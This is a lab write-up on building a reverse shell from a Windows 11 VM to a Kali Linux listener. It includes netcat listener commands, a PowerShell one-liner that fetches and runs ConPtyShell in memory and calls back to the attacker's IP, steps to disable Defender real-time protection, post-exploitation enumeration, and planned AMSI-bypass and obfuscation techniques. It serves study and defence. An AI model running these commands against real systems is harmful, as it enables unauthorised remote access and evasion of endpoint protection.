Author: MRMCyber
Date: February 23, 2026
Environment: Isolated Virtual Lab (Kali Linux & Windows 11)
Classification: Educational / Internal Research Only
—
1. Executive Summary
The objective of this technical lab is to analyze the mechanics of a Remote Access Trojan (RAT) by establishing a functional Reverse Shell between a Windows-based target and a Kali Linux attacker node. This report documents the network configuration required for peer-to-peer communication, the impact of Endpoint Detection and Response (EDR), specifically Windows Defender and the subsequent post-exploitation phase involving filesystem enumeration and data exfiltration.
Key Learning Objectives:
- Infrastructure: Configuring Bridged Networking to simulate a Local Area Network (LAN) attack vector.
- Payload Delivery: Executing memory-resident PowerShell payloads to minimize disk footprint.
- Defense Analysis: Observing AMSI (Antimalware Scan Interface) behavior and signature-based detection.
- Command & Control (C2): Transitioning from a basic TCP stream to a fully interactive pseudo-terminal (ConPTY).
—
2. Technical Architecture
To ensure a successful handshake, the environment must bypass the isolation of standard NAT configurations.
2.1 Networking: The Bridged Adapter
By default, Virtual Machines use Network Address Translation (NAT), placing the guest behind a virtual gateway. In a NAT environment, the host cannot easily route traffic back to the VM, breaking the reverse connection.
Configuration Steps:
Hypervisor Settings: Modify the Network Adapter to Bridged Mode.
Interface Selection: Bind the VM to the physical network interface (e.g., eth0 or wlan0).
IP Verification: Use ip a on Kali to confirm an IP within the host’s subnet (e.g., 192.168.1.0/24).
Note: In this setup, the Kali VM acts as a true peer on the network, allowing it to receive unsolicited outbound traffic from the Windows target.
—
3. Attack Vector Analysis
Bind Shell vs. Reverse Shell
Standard firewalls block Inbound connections (Bind Shells) by default. However, Outbound traffic (Reverse Shells) is frequently permitted to allow for web browsing and system updates.
| Feature | Bind Shell | Reverse Shell |
|---|
| Connection Origin | Attacker → Target | Target → Attacker |
| Firewall Status | Usually Blocked (Inbound) | Usually Permitted (Outbound) |
| Stealth | Low (Opens a new port) | Higher (Blends with egress traffic) |
—
4. Exploitation Walkthrough
Phase 1: Establishing the Listener
We utilize netcat (nc) on the attacker machine to listen for the incoming connection. For professional persistence, we bind to a “common” port (e.g., 443/HTTPS) to blend in with encrypted web traffic.
Bash
# -l: Listen | -v: Verbose | -n: No DNS | -p: Port | -s: Source IP
nc -lvnp 443 -s [KALI_IP]
Phase 2: Interactive Shell Upgrade (ConPtyShell)
A standard Netcat shell is “dumb”—it lacks tab completion and breaks when Ctrl+C is pressed. We use ConPtyShell to transform the session into a fully functional Windows terminal.
Step A: Prepare Attacker Terminal
Bash
stty raw -echo; (stty size; cat) | nc -lvnp 87 -s [KALI_IP]
Step B: Execute Target Payload
On the Windows host, we execute a “One-Liner” that downloads the script into memory (Invoke-WebRequest) and executes it (Invoke-Expression) without saving a file to the hard drive.
PowerShell
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [KALI_IP] 87
.png)
—
5. Defensive Response & EDR Analysis
5.1 Detection Logic
Upon initial execution, Windows Defender will trigger an alert. This occurs due to:
- AMSI Interception: The script is scanned in memory before the
IEX command completes.
- Static Signatures: The
Invoke-ConPtyShell string is a known indicator of compromise (IOC).
.png)
5.2 Controlled Bypass (Lab Setting)
To study post-exploitation, Real-Time Protection is temporarily disabled. This simulates a “successful” breach where an attacker has used an obfuscated dropper or an AMSI-bypass script.
.png)
With Real-Time Protection disabled, the PowerShell command executes without interruption. The ConPtyShell script is downloaded, loaded into memory, and the Windows host initiates an outbound TCP connection to the Kali listener. The connection is received on the Kali terminal and a fully interactive Windows shell prompt is returned.
.png)
Photo from Powershell
Photo from KALI
—
6. Post-Exploitation & Enumeration
Once the shell is established, we perform Situational Awareness to identify high-value data.
Common Enumeration Commands
| Command | Intent |
|---|
whoami | Identify current user privileges. |
net user | List local accounts for potential lateral movement. |
dir /s *.txt | Recursively search for sensitive text files (passwords, notes). |
ipconfig /all | Map the internal network and DNS settings. |
—
7. Future Research: Evasion Techniques
To evolve this lab, future iterations will focus on Evasion rather than manual deactivation of defenses.
- AMSI Patching: Forcing the AMSI provider to return a
CLEAN result regardless of the payload.
- Obfuscation: Using tools like
Invoke-Obfuscation to change the script’s abstract syntax tree (AST).
- Living-off-the-Land (LotL): Utilizing signed Windows binaries (e.g.,
certutil, msiexec) to proxy the download.
—
8. Conclusion
This lab demonstrates that while modern EDR solutions provide robust protection against known public tools, the Reverse Shell remains a potent vector for maintaining access. Proper network segmentation and Egress Filtering (restricting outbound ports) are critical defenses against this type of adversary behavior.
—
Disclaimer: This documentation is for authorized educational purposes only. Unauthorized access to computer systems is a violation of federal and international law.
